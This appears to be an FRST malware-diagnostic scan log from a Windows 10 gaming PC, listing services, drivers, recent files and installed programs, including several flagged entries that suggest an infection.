S2 AMD External Events Utility; C:\WINDOWS\system32\atiesrxx.exe [223216 2015-12-16] (Microsoft Windows Hardware Compatibility Publisher -> AMD)
S2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [284872 2015-11-04] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [4069992 2020-03-19] (AVB Disc Soft, SIA -> Disc Soft Ltd)
S3 EasyAntiCheat; C:\Program Files\EasyAntiCheat\EasyAntiCheat.exe [802432 2020-10-11] (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
S2 Hamachi2Svc; C:\Program Files\LogMeIn Hamachi\hamachi-2.exe [2243528 2019-04-02] (LogMeIn, Inc. -> LogMeIn Inc.)
S2 LMIGuardianSvc; C:\Program Files\LogMeIn Hamachi\LMIGuardianSvc.exe [405424 2016-05-27] (LogMeIn, Inc. -> LogMeIn, Inc.)
S2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [175240 2018-05-07] (Logitech Inc -> Logitech Inc.)
S2 MacriumService; C:\Program Files\Macrium\Common\MacriumService.exe [5996880 2020-08-05] (Paramount Software UK Ltd -> Paramount Software UK Ltd)
S2 MobiGameUpdater; C:\Program Files\MobiGame\MobiGameUpdater.exe [256000 2020-08-28] () [File not signed]
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3918680 2020-09-03] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\NisSrv.exe [1516320 2020-10-10] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\MsMpEng.exe [86088 2020-10-10] (Microsoft Windows Publisher -> Microsoft Corporation)
S2 WinDefender; C:\WINDOWS\windefender.exe [1987072 2020-09-11] () [File not signed]
S2 ekrn; "C:\Program Files\ESET\ESET Security\ekrn.exe" [X]
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S1 16F618EAF6A0; C:\WINDOWS\16F618EAF6A0.sys [21784 2020-09-11] (大连纵梦网络科技有限公司 -> FsFilter Network) [File not signed]
S3 amdkmdag; C:\WINDOWS\system32\DRIVERS\atikmdag.sys [19525104 2015-12-16] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.)
S3 amdkmdap; C:\WINDOWS\system32\DRIVERS\atikmpag.sys [542192 2015-12-16] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.)
R3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [38672 2020-03-19] (AVB Disc Soft, SIA -> Disc Soft Ltd)
R3 dtliteusbbus; C:\WINDOWS\System32\drivers\dtliteusbbus.sys [51680 2020-03-19] (AVB Disc Soft, SIA -> Disc Soft Ltd)
S3 Hamachi; C:\WINDOWS\System32\drivers\Hamdrv.sys [38512 2019-04-02] (Microsoft Windows Hardware Compatibility Publisher -> LogMeIn Inc.)
R3 LGBusEnum; C:\WINDOWS\system32\drivers\LGBusEnum.sys [32912 2018-05-07] (Logitech Inc -> Logitech Inc.)
S2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [13672 2015-06-21] (Logitech -> Logitech)
R3 LGJoyXlCore; C:\WINDOWS\system32\drivers\LGJoyXlCore.sys [63632 2018-05-07] (Logitech Inc -> Logitech Inc.)
S3 LGVirHid; C:\WINDOWS\system32\drivers\LGVirHid.sys [24856 2018-05-07] (Logitech Inc -> Logitech Inc.)
S1 MobiVBoxDrv; C:\Program Files\MobiGame\vbox\MobiVBoxDrv.sys [255640 2020-08-11] (Iron Entertainment Inc. -> Oracle Corporation)
S2 SecDrv; C:\WINDOWS\system32\drivers\SECDRV.SYS [28400 2020-09-25] () [File not signed]
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [39304 2020-10-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [332008 2020-10-10] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [49376 2020-10-10] (Microsoft Windows -> Microsoft Corporation)
S3 Winmon; C:\WINDOWS\System32\drivers\Winmon.sys [7248 2020-09-11] (WDKTestCert Admin,131480495282941941 -> ) [File not signed]
S3 WinmonFS; C:\WINDOWS\System32\drivers\WinmonFS.sys [18616 2020-09-11] (WDKTestCert Admin,131480495282941941 -> Windows (R) Win 7 DDK provider) [File not signed]
S1 WinmonProcessMonitor; C:\WINDOWS\System32\drivers\WinmonProcessMonitor.sys [28368 2020-09-11] (WDKTestCert Admin,131666266076831434 -> ) [File not signed] <==== ATTENTION
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) ===================
(If an entry is included in the fixlist, the file/folder will be moved.)
2020-10-20 22:08 - 2020-10-20 22:09 - 000018954 _____ C:\Users\42072\Desktop\FRST.txt
2020-10-20 22:08 - 2020-10-20 22:08 - 000000000 ____D C:\FRST
2020-10-20 22:07 - 2020-10-20 22:07 - 002013696 _____ (Farbar) C:\Users\42072\Desktop\FRST.exe
2020-10-20 21:26 - 2020-10-20 21:26 - 000000000 ____D C:\rsit
2020-10-20 21:26 - 2020-10-20 21:26 - 000000000 ____D C:\Program Files\trend micro
2020-10-20 16:52 - 2020-10-20 21:18 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2020-10-20 16:51 - 2020-10-20 16:51 - 000000000 ____D C:\WINDOWS\pss
2020-10-20 16:38 - 2020-10-20 16:46 - 000000000 ____D C:\Program Files\ESET
2020-10-20 16:34 - 2020-10-20 16:34 - 006333872 _____ (ESET) C:\Users\42072\Downloads\eset_internet_security_live_installer.exe
2020-10-20 16:26 - 2020-10-20 21:15 - 000003478 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d6a6eca8707e3f
2020-10-20 16:14 - 2020-10-20 16:22 - 000003478 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d6a6eaf808aca1
2020-10-20 16:10 - 2020-10-20 16:10 - 000003478 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d6a6ea70046158
2020-10-20 16:03 - 2020-10-20 16:29 - 000129056 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae.sys
2020-10-20 16:02 - 2020-10-20 16:30 - 000000000 ____D C:\ProgramData\Malwarebytes
2020-10-20 16:00 - 2020-10-20 16:00 - 002062144 _____ (Malwarebytes) C:\Users\42072\Downloads\MBSetup.exe
2020-10-20 16:00 - 2020-10-20 16:00 - 000000000 ____D C:\Program Files\Malwarebytes
2020-10-16 15:51 - 2020-10-16 15:51 - 000755728 _____ (Moonsworth, LLC) C:\Users\42072\Downloads\Lunar Client v2.3.5.exe
2020-10-16 15:41 - 2020-10-16 15:41 - 000000216 _____ C:\Users\42072\Desktop\SMITE - Public Test.url
2020-10-15 20:02 - 2020-10-15 20:02 - 000003460 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineUA
2020-10-15 20:02 - 2020-10-15 20:02 - 000003336 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineCore
2020-10-13 17:06 - 2020-10-13 17:06 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2020-10-12 12:47 - 2020-10-12 12:47 - 000000000 ____D C:\Users\42072\Documents\My Games
2020-10-12 12:04 - 2020-10-12 12:04 - 000000000 ____D C:\Users\42072\AppData\Roaming\EasyAntiCheat
2020-10-12 12:03 - 2020-10-12 12:04 - 000000000 ____D C:\Program Files\EasyAntiCheat
2020-10-11 12:39 - 2020-10-11 12:39 - 000755720 _____ (Moonsworth, LLC) C:\Users\42072\Downloads\Lunar Client v2.3.4.exe
2020-10-11 12:02 - 2020-10-16 15:41 - 000000000 ____D C:\Users\42072\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2020-10-11 12:02 - 2020-10-11 12:02 - 000000216 _____ C:\Users\42072\Desktop\SMITE.url
2020-10-11 11:36 - 2020-10-11 11:36 - 000000000 ____D C:\Users\42072\AppData\Local\Steam
2020-10-11 11:33 - 2020-10-20 15:36 - 000000000 ____D C:\Program Files\Common Files\Steam
2020-10-11 11:32 - 2020-10-20 21:16 - 000000000 ____D C:\Program Files\Steam
2020-10-11 11:32 - 2020-10-11 11:32 - 001573568 _____ C:\Users\42072\Downloads\SteamSetup.exe
2020-10-11 11:32 - 2020-10-11 11:32 - 000000994 _____ C:\Users\Public\Desktop\Steam.lnk
2020-10-11 11:32 - 2020-10-11 11:32 - 000000994 _____ C:\ProgramData\Desktop\Steam.lnk
2020-10-11 11:32 - 2020-10-11 11:32 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2020-10-10 22:27 - 2020-10-10 22:27 - 000036044 _____ C:\Users\42072\Downloads\PVP-h.webp
2020-10-10 19:28 - 2020-10-10 22:06 - 1716267027 _____ C:\Users\42072\Downloads\Star-Wars-cast-1.cz-dabing.avi
2020-10-10 18:11 - 2020-10-10 18:11 - 000000000 ____D C:\Program Files\Common Files\Oracle
2020-10-10 18:10 - 2020-10-10 18:10 - 000000000 ____D C:\Program Files\Common Files\Java
2020-10-10 18:05 - 2020-10-10 19:03 - 1048576000 _____ C:\Users\42072\Downloads\Star Wars Epizoda I - Skrytá hrozba (1999).mkv.7z.004
2020-10-09 18:02 - 2020-10-09 18:02 - 067953134 _____ C:\Users\42072\Downloads\RiotClientServices.exe.ogdo
2020-10-09 16:28 - 2020-09-25 21:04 - 000000077 _____ C:\Users\42072\Desktop\pack.mcmeta
2020-10-09 15:14 - 2020-10-09 15:15 - 000000000 ____D C:\Users\42072\Desktop\hudebka
2020-10-09 15:10 - 2020-10-09 15:14 - 369135537 _____ C:\Users\42072\Downloads\zasilka-DK2W5P8NG9U6YNLM.zip
2020-09-27 15:04 - 2020-09-27 15:04 - 000002155 _____ C:\Users\Public\Desktop\Serious Sam 2.lnk
2020-09-27 15:04 - 2020-09-27 15:04 - 000002155 _____ C:\ProgramData\Desktop\Serious Sam 2.lnk
2020-09-27 15:04 - 2020-09-27 15:04 - 000000000 ____D C:\WINDOWS\system32\directx
2020-09-27 15:01 - 2016-03-26 15:57 - 000000000 ____D C:\Users\42072\Desktop\Serious Sam 2 CZ (v2.070)
2020-09-27 12:36 - 2020-09-27 15:00 - 2601257270 _____ C:\Users\42072\Downloads\Serious Sam 2 CZ (v2.070).rar
2020-09-26 19:47 - 2020-09-26 19:47 - 000002055 _____ C:\Users\Public\Desktop\Serious Sam 3 BFE.lnk
2020-09-26 19:47 - 2020-09-26 19:47 - 000002055 _____ C:\ProgramData\Desktop\Serious Sam 3 BFE.lnk
2020-09-26 19:45 - 2020-09-26 19:47 - 000000000 ____D C:\Program Files\Serious Sam 3 BFE
2020-09-26 19:40 - 2020-09-26 19:41 - 000000000 ____D C:\Users\42072\Desktop\Serious Sam
2020-09-26 19:40 - 2020-09-26 19:41 - 000000000 ____D C:\Users\42072\Desktop\party
2020-09-25 18:13 - 2020-09-25 18:13 - 000000000 ____D C:\Program Files\directx
2020-09-25 17:57 - 2020-09-25 17:57 - 000028400 _____ C:\WINDOWS\system32\Drivers\SECDRV.SYS
2020-09-25 17:54 - 2020-09-25 17:54 - 000001039 _____ C:\Users\42072\Desktop\GameSpy Arcade.lnk
2020-09-25 17:54 - 2020-09-25 17:54 - 000000000 ____D C:\Users\42072\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GameSpy Arcade
2020-09-25 17:54 - 2020-09-25 17:54 - 000000000 ____D C:\Program Files\GameSpy Arcade
2020-09-25 17:51 - 2020-09-27 15:03 - 000000000 ____D C:\Program Files\Croteam
2020-09-25 17:35 - 2020-09-25 17:35 - 000000000 ____D C:\Users\42072\AppData\Roaming\VEGAS
2020-09-25 17:35 - 2020-09-25 17:35 - 000000000 ____D C:\ProgramData\Magix
2020-09-25 17:16 - 2020-09-25 17:16 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Logitech
2020-09-20 11:27 - 2020-09-20 11:27 - 112859648 _____ (Logitech Inc.) C:\Users\42072\Downloads\LGS_9.00.42_x86_Logitech.exe
2020-09-20 11:21 - 2020-09-20 11:22 - 113978120 _____ (Logicool Inc.) C:\Users\42072\Downloads\LGS_9.02.65_x86_Logicool.exe
2020-09-20 11:06 - 2020-09-20 11:07 - 036588168 _____ (Logitech, Inc.) C:\Users\42072\Downloads\lghub_installer.exe
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2020-10-20 21:21 - 2020-09-03 08:47 - 001605602 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2020-10-20 21:21 - 2019-12-07 14:21 - 000682184 _____ C:\WINDOWS\system32\perfh005.dat
2020-10-20 21:21 - 2019-12-07 14:21 - 000137000 _____ C:\WINDOWS\system32\perfc005.dat
2020-10-20 21:21 - 2019-12-07 08:10 - 000000000 ____D C:\WINDOWS\INF
2020-10-20 21:17 - 2020-09-03 08:50 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2020-10-20 21:17 - 2020-09-03 08:40 - 000008192 ___SH C:\DumpStack.log.tmp
2020-10-20 21:17 - 2019-12-07 08:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2020-10-20 21:15 - 2020-09-03 08:50 - 000003572 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2020-10-20 21:15 - 2020-04-24 17:59 - 000000000 ____D C:\Users\42072\AppData\Local\LogMeIn Hamachi
2020-10-20 16:56 - 2020-09-11 18:30 - 000003270 _____ C:\WINDOWS\system32\Tasks\csrss
2020-10-20 16:56 - 2019-12-07 08:12 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-10-20 16:40 - 2019-12-07 08:12 - 000000000 ____D C:\WINDOWS\AppReadiness
2020-10-20 16:35 - 2019-10-04 18:17 - 000000000 ____D C:\Users\42072\AppData\LocalLow\Mozilla
2020-10-20 16:32 - 2020-09-06 16:53 - 000000000 ____D C:\Users\42072\.MobiVBox
2020-10-20 16:30 - 2020-09-06 16:31 - 000000000 ____D C:\Users\42072\AppData\Local\MobiGame
2020-10-20 16:06 - 2020-09-03 08:50 - 000003448 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2020-10-20 15:59 - 2020-08-20 11:14 - 000007602 _____ C:\Users\42072\AppData\Local\Resmon.ResmonCfg
2020-10-20 15:55 - 2020-09-03 08:40 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2020-10-20 15:05 - 2020-09-03 08:08 - 000000000 ____D C:\Users\42072
2020-10-18 19:51 - 2020-09-06 17:13 - 000000000 ____D C:\Users\42072\AppData\Local\GeometryDash
2020-10-18 19:49 - 2019-10-04 18:40 - 000000000 ____D C:\Users\42072\AppData\Roaming\.minecraft
2020-10-18 19:02 - 2020-03-17 19:18 - 000000000 ____D C:\Users\42072\AppData\Roaming\lunarclient
2020-10-17 12:40 - 2019-12-07 08:12 - 000000000 ___HD C:\Program Files\WindowsApps
2020-10-17 12:39 - 2020-06-13 16:22 - 000002365 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2020-10-17 12:39 - 2020-06-13 16:22 - 000002203 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2020-10-17 12:39 - 2020-06-13 16:22 - 000002203 _____ C:\ProgramData\Desktop\Microsoft Edge.lnk
2020-10-15 19:53 - 2020-09-02 20:26 - 000000000 ____D C:\Program Files\Mozilla Firefox
2020-10-14 20:43 - 2020-06-07 17:52 - 000000000 ____D C:\Program Files\R.G. Mechanics
2020-10-14 20:33 - 2019-12-07 14:39 - 000000000 ____D C:\Users\42072\AppData\Roaming\Spotify
2020-10-14 19:55 - 2020-05-19 11:17 - 000000000 ____D C:\Users\42072\AppData\Local\ElevatedDiagnostics
2020-10-13 17:06 - 2019-10-04 18:20 - 000001166 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2020-10-12 11:39 - 2019-10-04 17:12 - 000000000 ____D C:\ProgramData\Package Cache
2020-10-10 18:11 - 2019-10-05 12:00 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2020-10-10 18:11 - 2019-10-05 11:59 - 000000000 ____D C:\Program Files\Java
2020-10-10 18:08 - 2019-10-05 12:00 - 000164008 _____ (Oracle Corporation) C:\WINDOWS\system32\WindowsAccessBridge.dll
2020-10-10 14:21 - 2019-10-04 16:40 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2020-10-09 17:59 - 2020-03-29 13:06 - 000001882 _____ C:\Users\Public\Desktop\League of Legends.lnk
2020-10-09 17:59 - 2020-03-29 13:06 - 000001882 _____ C:\ProgramData\Desktop\League of Legends.lnk
2020-10-09 15:26 - 2020-03-19 22:17 - 000002247 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-10-09 15:26 - 2020-03-19 22:17 - 000002206 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2020-10-09 15:26 - 2020-03-19 22:17 - 000002206 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2020-10-02 16:15 - 2019-10-05 13:55 - 000000000 ____D C:\Users\42072\AppData\Roaming\TS3Client
2020-09-28 11:49 - 2019-10-04 18:17 - 000000000 ____D C:\ProgramData\Mozilla
2020-09-25 21:50 - 2020-07-05 16:54 - 000000000 ____D C:\Users\42072\Desktop\assets
2020-09-25 18:20 - 2020-03-17 14:21 - 000000000 ____D C:\Program Files\Common Files\InstallShield
2020-09-25 18:19 - 2020-03-17 14:32 - 000000000 ___HD C:\Program Files\InstallShield Installation Information
2020-09-25 17:19 - 2020-06-05 22:24 - 000000000 ____D C:\Program Files\Logitech Gaming Software
2020-09-20 11:29 - 2020-07-10 19:33 - 000000000 ____D C:\Users\Public\Logi
==================== Files in the root of some directories ========
2020-09-11 18:26 - 2020-09-11 18:26 - 000334288 _____ (Mozilla Foundation) C:\ProgramData\freebl3.dll
2020-09-11 18:26 - 2020-09-11 18:26 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
2020-09-11 18:26 - 2020-09-11 18:26 - 000440120 _____ (Microsoft Corporation) C:\ProgramData\msvcp140.dll
2020-09-11 18:26 - 2020-09-11 18:26 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
2020-09-11 18:26 - 2020-09-11 18:26 - 000144848 _____ (Mozilla Foundation) C:\ProgramData\softokn3.dll
2020-09-11 18:26 - 2020-09-11 18:26 - 000083784 _____ (Microsoft Corporation) C:\ProgramData\vcruntime140.dll
2020-06-06 15:47 - 2017-06-27 17:26 - 000360779 _____ () C:\Users\42072\AppData\Roaming\BetterPvP_1.13.1.1_Forge_1.8.9.jar
2020-06-06 15:47 - 2018-03-10 12:06 - 000012002 _____ () C:\Users\42072\AppData\Roaming\MemoryFix-0.3.jar
2020-06-06 15:47 - 2017-11-21 18:52 - 000004306 _____ () C:\Users\42072\AppData\Roaming\MouseDelayFix-1.0.jar
2020-06-06 15:47 - 2017-01-07 22:50 - 000073014 _____ () C:\Users\42072\AppData\Roaming\OldAnimationsMod v2.3.1 Classloader FORGE MC1.8.9.jar
2020-06-06 15:47 - 2017-01-07 03:08 - 002261831 _____ () C:\Users\42072\AppData\Roaming\OldAnimationsMod v2.3.1 FORGE MC1.8.9.jar
2020-06-06 15:47 - 2018-04-20 16:30 - 002016181 _____ () C:\Users\42072\AppData\Roaming\OptiFine_1.8.9_HD_U_I7.jar
2020-06-06 15:47 - 2018-09-04 12:02 - 000073508 _____ () C:\Users\42072\AppData\Roaming\Orange's+Simple+Mods-1.2.jar
2020-06-06 15:47 - 2018-09-04 11:52 - 000015089 _____ () C:\Users\42072\AppData\Roaming\TimeChanger-1.0 (1.8.9).jar
2020-05-21 11:55 - 2020-05-22 10:43 - 000000035 _____ () C:\Users\42072\AppData\Roaming\WB.CFG
2020-06-06 15:47 - 2018-03-17 14:05 - 000062916 _____ () C:\Users\42072\AppData\Roaming\[1.8.9] BetterFps-1.2.0.jar
2020-06-06 15:47 - 2018-03-17 13:51 - 000058995 _____ () C:\Users\42072\AppData\Roaming\[1.8.9] FoamFixUnofficial.jar
2020-06-06 15:47 - 2018-03-04 16:59 - 000006718 _____ () C:\Users\42072\AppData\Roaming\[1.8.9] NameChanger.jar
2020-06-06 15:47 - 2018-09-04 11:59 - 000026327 _____ () C:\Users\42072\AppData\Roaming\[1.8.9] Powns Coords HUD - 1.0.jar
2020-06-06 15:47 - 2018-10-02 18:18 - 000024908 _____ () C:\Users\42072\AppData\Roaming\[v3] (1.8.9) canelex3keystrokes.jar
2020-09-11 18:32 - 2020-09-11 18:32 - 000000559 _____ () C:\Users\42072\AppData\Local\bowsakkdestx.txt
2020-08-20 11:14 - 2020-10-20 15:59 - 000007602 _____ () C:\Users\42072\AppData\Local\Resmon.ResmonCfg
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
safeboot: Minimal => The system is configured to boot to Safe Mode <==== ATTENTION
==================== End of FRST.txt ========================
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 19-10-2020
Ran by 42072 (20-10-2020 22:10:00)
Running from C:\Users\42072\Desktop
Microsoft Windows 10 Pro Version 2004 19041.450 (X86) (2020-09-03 06:51:10)
Boot Mode: Safe Mode (minimal)
==========================================================
==================== Accounts: =============================
42072 (S-1-5-21-3093974370-3673700369-3101221773-1002 - Administrator - Enabled) => C:\Users\42072
Administrator (S-1-5-21-3093974370-3673700369-3101221773-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3093974370-3673700369-3101221773-503 - Limited - Disabled)
Guest (S-1-5-21-3093974370-3673700369-3101221773-501 - Limited - Disabled)
WDAGUtilityAccount (S-1-5-21-3093974370-3673700369-3101221773-504 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: AVG Antivirus (Enabled - Up to date) {4FC75CA5-1654-5411-7CFB-1893D506BCF4}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
AMD Catalyst Control Center (HKLM\...\WUCCCApp) (Version: 1.00.0000 - AMD)
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.12.0.1152 - Disc Soft Ltd)
DiskFixer version 1.0 (HKLM\...\DiskFixer_is1) (Version: 1.0 - MyAppsLand) <==== ATTENTION
DNPlayer, âĺđńč˙ 5.7.8.13 (HKLM\...\{51D1A917-78AE-4E70-B8DC-88412D7B7226}_is1) (Version: 5.7.8.13 - DNPlayer)
Duke Nukem - Manhattan Project (HKLM\...\{8B9336DB-8D04-4325-BAFC-C7141D8E6CA1}) (Version: 1.0.0 - Arush Entertainment) Hidden
Duke Nukem - Manhattan Project (HKLM\...\InstallShield_{8B9336DB-8D04-4325-BAFC-C7141D8E6CA1}) (Version: 1.0.0 - Arush Entertainment)
DVD Architect (HKLM\...\{1D8D144F-3558-11E9-A3D6-00155D6302F2}) (Version: 7.0.100 - VEGAS)
Epic Games Launcher (HKLM\...\{1D4EB18B-0FEE-444E-B4D1-6F2CFBC363E6}) (Version: 1.1.267.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x86) (HKLM\...\{B633DAAD-9294-4C7D-A625-D5B741A8C2B6}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Fraps (HKLM\...\Fraps) (Version: - )
GameSpy Arcade (HKLM\...\GameSpy Arcade) (Version: - )
Google Chrome (HKLM\...\Google Chrome) (Version: 86.0.4240.75 - Google LLC)
Google Update Helper (HKLM\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.31 - Google LLC) Hidden
Chromium (HKLM\...\{F0FB183B-A07B-C9BB-11FB-B93BC17B6ABB}) (Version: - )
Java 8 Update 261 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F32180261F0}) (Version: 8.0.2610.12 - Oracle Corporation)
Launcher Prerequisites (x86) (HKLM\...\{ec50c375-be9a-4642-9b8c-86dcc42e39c3}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
League of Legends (HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Riot Game league_of_legends.live) (Version: - Riot Games, Inc)
Logitech Gaming Software 9.00 (HKLM\...\Logitech Gaming Software) (Version: 9.00.42 - Logitech Inc.)
Logitech Options (HKLM\...\LogiOptions) (Version: 8.20.329 - Logitech)
LogMeIn Hamachi (HKLM\...\{ECC0FA07-863E-44BC-8B1D-DA22F96E5FB7}) (Version: 2.2.0.633 - LogMeIn, Inc.) Hidden
LogMeIn Hamachi (HKLM\...\LogMeIn Hamachi) (Version: 2.2.0.633 - LogMeIn, Inc.)
Lunar Client (HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\1fcec38f-e773-5444-8669-32b8eb41524b) (Version: 2.3.5 - Moonsworth, LLC)
Macrium Reflect Free Edition (HKLM\...\{7488FFD6-2CB1-4A7B-A788-3BCA60A44E7D}) (Version: 7.2.5107 - Paramount Software (UK) Ltd.) Hidden
Macrium Reflect Free Edition (HKLM\...\MacriumReflect) (Version: 7.2 - Paramount Software (UK) Ltd.)
Microsoft Edge (HKLM\...\Microsoft Edge) (Version: 86.0.622.43 - Microsoft Corporation)
Microsoft Edge Update (HKLM\...\Microsoft Edge Update) (Version: 1.3.135.49 - )
Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Minecraft Launcher (HKLM\...\{CFF44AE9-2908-4D7D-B48B-1CB5139015C7}) (Version: 1.0.0.0 - Mojang)
MobiGame (HKLM\...\{D400ECB0-A0E7-49EC-AF24-D449A4671D11}) (Version: 3.8.15.0 - MobiGame)
Mozilla Firefox 81.0.2 (x86 cs) (HKLM\...\Mozilla Firefox 81.0.2 (x86 cs)) (Version: 81.0.2 - Mozilla)
Nástroje kontroly pravopisu pro Microsoft Office 2016 – čeština (HKLM\...\{90160000-001F-0405-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje korektúry balíka Microsoft Office 2016 - slovenčina (HKLM\...\{90160000-001F-041B-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
OBS Studio (HKLM\...\OBS Studio) (Version: 25.0.8 - OBS Project)
Paragon Migrate OS to SSD™ (HKLM\...\{D4378A80-C713-11DF-9399-005056C00008}) (Version: 90.00.0003 - Paragon Software)
Pic version 10.2 (HKLM\...\{13E374E4-E610-4F9E-ACC4-E461DA17D869}_is1) (Version: 10.2 - Pics)
pvk_5.4.2.3, âĺđńč˙ 5.4.2.3 (HKLM\...\{212945B6-8BD1-4CBE-9399-685AB22FAB51}_is1) (Version: 5.4.2.3 - isp)
Serious Sam 2 verze 2.070 (HKLM\...\{C5E4298B-3581-4AAD-9FAF-2FE76C07EFC8}_is1) (Version: 2.070 - Croteam)
Serious Sam 3 BFE (HKLM\...\{97425B85-2311-435E-9A28-0AA11B41E322}_is1) (Version: - Croteam)
Seznam Software (HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\SeznamInstall) (Version: 2.1.32 - Seznam.cz)
Spotify (HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Spotify) (Version: 1.1.35.458.g891674f3 - Spotify AB)
Steam (HKLM\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Super Meat Boy v1.5 (HKLM\...\Super Meat Boy v1.5_is1) (Version: - Team Meat)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.3.0 - TeamSpeak Systems GmbH)
WinRAR 5.90 beta 3 (32-bit) (HKLM\...\WinRAR archiver) (Version: 5.90.3 - win.rar GmbH)
Packages:
=========
